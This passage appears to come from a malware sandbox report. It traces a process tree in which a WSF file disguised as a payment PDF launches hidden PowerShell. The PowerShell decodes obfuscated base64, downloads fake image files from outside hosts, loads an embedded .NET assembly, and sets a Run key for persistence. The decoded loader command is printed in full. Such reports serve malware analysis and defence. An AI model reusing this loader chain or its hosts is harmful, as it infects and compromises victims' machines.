DgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTre2DgTreDDgTreDgTreLwDgTrewDgTreDQDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre4DgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTreEEDgTreTwDgTreuDgTreFYDgTreQgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreG0DgTreZQB0DgTreGgDgTrebwBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTreuDgTreEcDgTreZQB0DgTreE0DgTreZQB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTreZQDgTreoDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTresDgTreCDgTreDgTreWwBvDgTreGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwB0DgTreHgDgTredDgTreDgTreuDgTreHIDgTreYQBtDgTreC8DgTreZQBkDgTreC8DgTreZDgTreBpDgTreC4DgTrecwBuDgTreHoDgTreLwDgTrevDgTreDoDgTrecwBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBXDgTreGkDgTrebgBkDgTreG8DgTredwBzDgTreFwDgTreVDgTreBlDgTreG0DgTrecDgTreBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBODgTreGEDgTrebQBlDgTreFcDgTrecwBmDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
                                    2⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3760
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.ram/ed/di.snz//:sptth' , '1' , 'C:\Windows\Temp\' , 'NameWsf','RegAsm',''))} }"
                                      3⤵
                                      • Blocklisted process makes network request
                                      • Adds Run key to start application
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3780
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\NameWsf.vbs
                                        4⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2000
                                • C:\Windows\System32\WScript.exe
                                  "C:\Windows\System32\WScript.exe" "E:\Payment-pdf.wsf"
                                  1⤵
                                  • Checks computer location settings
                                  • Enumerates connected drives
                                  PID:4520
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTre2DgTreDDgTreDgTreLwDgTrewDgTreDQDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre4DgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTreEEDgTreTwDgTreuDgTreFYDgTreQgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreG0DgTreZQB0DgTreGgDgTrebwBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTreuDgTreEcDgTreZQB0DgTreE0DgTreZQB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTreZQDgTreoDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTresDgTreCDgTreDgTreWwBvDgTreGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwB0DgTreHgDgTredDgTreDgTreuDgTreHIDgTreYQBtDgTreC8DgTreZQBkDgTreC8DgTreZDgTreBpDgTreC4DgTrecwBuDgTreHoDgTreLwDgTrevDgTreDoDgTrecwBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBXDgTreGkDgTrebgBkDgTreG8DgTredwBzDgTreFwDgTreVDgTreBlDgTreG0DgTrecDgTreBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBODgTreGEDgTrebQBlDgTreFcDgTrecwBmDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
                                    2⤵
                                    • Suspicious behavior: EnumeratesProcesses
